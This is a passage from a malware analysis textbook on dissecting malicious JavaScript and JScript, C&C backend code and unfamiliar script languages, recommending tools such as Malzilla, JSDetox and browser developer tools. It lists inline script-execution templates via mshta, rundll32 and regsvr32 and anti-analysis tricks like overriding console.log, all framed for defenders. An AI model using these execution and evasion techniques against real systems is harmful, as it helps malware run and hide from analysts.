Alternatively, the Write-Host cmdlet can be used to write the decrypted output to the console and then redirect it to a file. Finally, a great tool called PSDecode can be used to quickly try to handle obfuscation automatically (this may involve code execution, so use it with care).

Now, it is time to talk about JavaScript-based threats.

Handling JavaScript

JavaScript is a web language that powers billions of pages on the internet, so it is no surprise that it is commonly used to create exploits that target web users. However, on Windows, it is also possible to execute JScript (a very similar dialect of ECMAScript) files through Windows Script Host, which also makes it a good candidate for malicious attachments and post-compromised scripting. For example, a fileless threat called Poweliks uses JScript code stored in the registry to achieve system persistence without leaving separate files on a disk.

Since there are minor differences between JavaScript and JScript, here, we will cover syntax that is common to both of them. Additionally, starting from this moment, we will use the JavaScript notation.

The universal file extension for JavaScript files is .js; encoded JScript files have the .jse extension. Additionally, they can be embedded into .wsf and .hta files in the same way as VBScript. In terms of similarity, on Windows, both .js/.jse and .wsf files can be executed locally by wscript.exe and cscript.exe. On the other hand, .hta files are executed by mshta.exe. There are several ways to execute inline JavaScript scripts:

mshta javascript:<script_body>

rundll32.exe javascript:"..mshtml,RunHTMLApplication";<script_body>

In addition to this, on Windows, it is possible to execute JavaScript code using regsvr32.exe as a COM scriptlet (.sct files). On Linux, multiple options are available for executing JavaScript files from the console, such as phantomjs, and, of course, the JavaScript code can be executed in full-fledged browsers. We will cover this in more detail in the Static and dynamic analysis section.

Basic syntax

If the script is going to be executed locally, particular attention should be paid to certain types of operations that can answer questions about its purpose, persistence mechanism, and communication protocol. In terms of similarity with VBScript, on Windows, the same COM objects can be used for this purpose, as described previously:

Figure 10.23 – An example of JavaScript code writing data to a file on Windows

Figure 10.23 – An example of JavaScript code writing data to a file on Windows

On Linux, JavaScript is not used to execute commands locally as it requires some custom modules, such as node.js, which may not be available on the target system.

In terms of web applications, the following functions need to be paid attention to:

Code execution:

eval: Execute a script block provided as an argument

Page redirects:

There are multiple options here, as shown in the following code block:

  • window.location = '<new_url>';
  • window.location.href = '<new_url>';
  • window.location.assign('<new_url>');
  • window.location.replace('<new_url>'); // overwrites current page in the browser history

Important note

The window. part can commonly be omitted.

  • self.location = '<new_url>';
  • top.location = '<new_url>';
  • document.location = '<new_url>';

    Important note

    There are also possible derivatives for them, similar to the window.location-based techniques mentioned previously.

Apart from that, there is also another way to redirect the user without using JavaScript:

  • <meta http-equiv="refresh" content="<num_of_seconds>; url=<new_url>">;

External script loading:

  • <script src="<name>.js">
  • var script = document.createElement('script'); script.src = <something>;

Web requests to remote machines:

  • The XMLHttpRequest object:
    • open: A method to create a request
    • send: A method to send a request
    • responseText: A property to access the server response
  • fetch: A relatively new way to send and process HTTP requests that was standardized in ES6.

Popular libraries such as jQuery and custom implementations of asynchronous JavaScript and XML (Ajax) usually utilize XMLHttpRequest and sometimes fetch requests on the backend.

Anti-reverse engineering tricks

The most common JavaScript obfuscation technique that’s employed with some variations is dynamically building the next layer of JavaScript code by either decrypting it or assembling it from integers with the subsequent execution using the eval function or updating the document using document.write:

Figure 10.24 – Obfuscated JavaScript-based threat

Figure 10.24 – Obfuscated JavaScript-based threat

However, several other techniques are widely used by malware authors:

  • Storing the block required for successful decryption in a separate block or file: In this case, obtaining only the decryption function may not be enough as it relies on some other piece of data being stored externally.
  • Checking the execution time: This approach aims to disrupt the dynamic analysis since the code execution takes much more time than average. For this purpose, the performance.now() or date.now() functions are used.
  • Logging the sequence of executed functions: Here, malware behaves differently if the sequence has changed; for example, by using the arguments.callee property.
  • Redefining the functions used in dynamic analysis: A good example of this can be redefining the console.log function:

    window['console']['log'] = <other_function>;

Alternatively, it is possible to redefine the function as follows:

var console = {};

console.log = <other_function>;

  • Detecting developer tools: There are multiple ways this can be implemented, such as by checking Windows’ inner and outer sizes.

There are other techniques as well, but these are used in malware most often.

Static and dynamic analysis

With web development on the rise, there are plenty of tools that exist for analyzing and debugging JavaScript code – from basic text editors with syntax highlights to quite sophisticated packages. However, the developer’s use cases are quite different from the reverse engineer’s, which eventually determines which set of programs are used by them.

First of all, to speed up the analysis, it makes sense to reformat the existing JavaScript code so that it is easier to follow the logic. Multiple tools serve this purpose and they contain basic unpacking and deobfuscation logic, such as jsbeautifier.

In terms of generic dynamic analysis, embedded browser toolsets such as Chrome Developer Tools and Firefox Developer Tools are extremely handy. To use them, a small HTML block needs to be written to load the JavaScript file of interest.

Here, the JavaScript code is embedded into the page itself:

Figure 10.25 – An example of the embedded JavaScript code in Chrome Developer Tools

Figure 10.25 – An example of the embedded JavaScript code in Chrome Developer Tools

Here is the externally loaded JavaScript script in Firefox:

Figure 10.26 – An example of the external JavaScript script in Firefox Developer Tools

Figure 10.26 – An example of the external JavaScript script in Firefox Developer Tools

In addition to this, several customized tools implement the functionality required for malware analysis. One of them is Malzilla; this free toolset combines multiple smaller tools that aim to make analysis easier by implementing the most common operations required. While relatively old, it is still used by many malware analysts to quickly go through obfuscation layers and extract the actual functionality.

The most commonly used functionality of Malzilla is the module that can intercept the eval call and output its argument to the screen. This is an extremely useful feature as most obfuscation techniques build up the actual payload before executing it using this function. This means that this is the point where the decrypted or deobfuscated logic becomes available, sometimes after a few iterations. It also includes various smart decoders that drastically speed up the analysis:

Figure 10.27 – Malzilla decoders

Figure 10.27 – Malzilla decoders

Another example of such a tool is the more recent JSDetox project. It aims to facilitate static analysis and handle JavaScript obfuscation techniques. Unlike Malzilla, it is more focused on the Linux environment:

Figure 10.28 – The JSDetox website describing its functionality

Figure 10.28 – The JSDetox website describing its functionality

Now, let’s talk about the backend code.

Behind C&C – even malware has its own backend

Many malware families use some sort of C&C server to receive updates or custom commands from the malicious actor or to exfiltrate stolen data. Getting access to these backend files can give researchers and law enforcement agencies a lot of information about how malware works and who the victims are. Sometimes, it can even lead to the actual people behind the attack! Therefore, properly and promptly analyzing the code obtained from the C&C is an important task that researchers have to face from time to time, so it’s better to be ready!

Things to focus on

So long as the analyst has access to the code, it makes sense to prepare and prioritize a list of questions to answer. Generally, the following knowledge can be obtained from the backend:

  • Is it an actual backend code or a proxy redirecting messages to another location? What URI or port does the malware utilize?
  • What is the format of the accepted requests or messages and is there any encryption involved?
  • Are there any commands that it can return to the malware, either automatically or on demand?
  • Can it issue self-destruction commands and is there any form of authentication for them?
  • Is there a web interface or dashboard available for the attacker?
  • What are the locations for the logs, the additional payloads delivered, and the stolen data?
  • Are there any statistics about affected users available?
  • Are there any logs that will reveal the malware writer’s identity? The SSH or RDP/custom RAT logs may help answer this question.

More advanced steps include searching for communication patterns that may help identify future C&Cs. If the HTTPS protocol was used, it may make sense to check where the corresponding certificate came from.

Static and dynamic analysis

Multiple programming languages can be used to implement a backend. Whether it is PHP, Perl, Python, or something else, you need to correctly identify the programming language and check whether it is a ready framework. The first part of this task can be solved by looking at the corresponding file extensions. For the second part, the configuration files or directories will usually contain the name of the framework used.

Installing the corresponding IDE and loading the project there will drastically speed up further analysis as it will facilitate efficient static and dynamic analysis.

Other script languages

In this chapter, we covered the most common examples of languages used nowadays. But what if you encounter something more exotic that you don’t have a ready step-by-step tutorial for? Or what if a new script language becomes increasingly popular, is available on lots of systems, and is, therefore, misused by malicious actors? Don’t panic – we have summarized the ideas that will help you successfully analyze any new threat.

Where to start

Here is what you should do when analyzing a new threat:

  1. Identify the language. There are multiple ways to do this, as follows:
    • Look at the file extensions used
    • Use the file tool
    • Search for the header signature online
    • Check strings as they may give additional clues
  2. If the script requires some particular OS, make sure that you have a proper VM image set up.

If the script language is compiled, search for tools such as decompilers or disassemblers to make static analysis possible.

  1. If the code is not compiled and the source code has been obtained, check for the best IDE or syntax highlighter available. Use your preferred solution that supports debugging to make dynamic analysis more convenient.
  2. Search for manuals on how to read the code – either the original or the one that comes with the help files for the corresponding tools. Additionally, check whether there are some APIs available.
  3. If the code is obfuscated, try existing deobfuscators if there are any. It is always possible to use code beautifiers and name replacements to make the code more readable.
  4. Check whether any dynamic analysis monitors or sandboxes are available that can log all critical functionality when the code is being executed.
  5. Often, it is easier to review the output of dynamic analysis tools and then switch to static analysis so that you have some basic understanding of at least part of the functionality. Employ dynamic analysis when you need to decrypt some important block of data or when you want to understand the logic behind some piece of code.

Once you can analyze code, the next important step will be figuring out what to focus on.

Questions to answer

Reverse engineering is not just an engineering task – often, it requires a certain amount of research and creativity to solve the corresponding challenges.

Usually, the analysis time is limited by circumstances. Therefore, pay particular attention to the functionality that will help answer the questions needed to complete the report. This part might be tricky because, without taking a look at everything, it is difficult to say whether the description is complete or not. Searching for the keywords of functions of interest and checking their references should be a good starting point. After this, it makes sense to check whether any block of code was encrypted, encoded, or loaded externally. Keeping your markup accurate will help you navigate the whole project and allow you to quickly come back later if necessary.

Summary

In this chapter, we covered multiple script languages and document macros that are often misused by attackers. We described the motivation behind a malware writer’s decision when they are choosing a particular approach. Additionally, we explored ready-to-use recipes on how to solve particular challenges specific to each language and summarized what functionality to pay attention to. You also gained a good understanding of various tools that will drastically help speed up analysis.

Finally, we covered generic approaches on how to handle malicious code written in virtually any script language that you may encounter. We also discussed the sequence of actions to follow to analyze malicious code efficiently.

After completing this chapter, you can now successfully perform static and dynamic analyses of various scripts, bypass anti-reversing techniques, and understand the core functionality of malware.

In Chapter 11, Dissecting Linux and IoT Malware, we will explore threats that target various Linux-based and IoT systems, learn how to analyze them, and then learn how to extend some of the knowledge you have gained from this chapter.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
18.219.102.189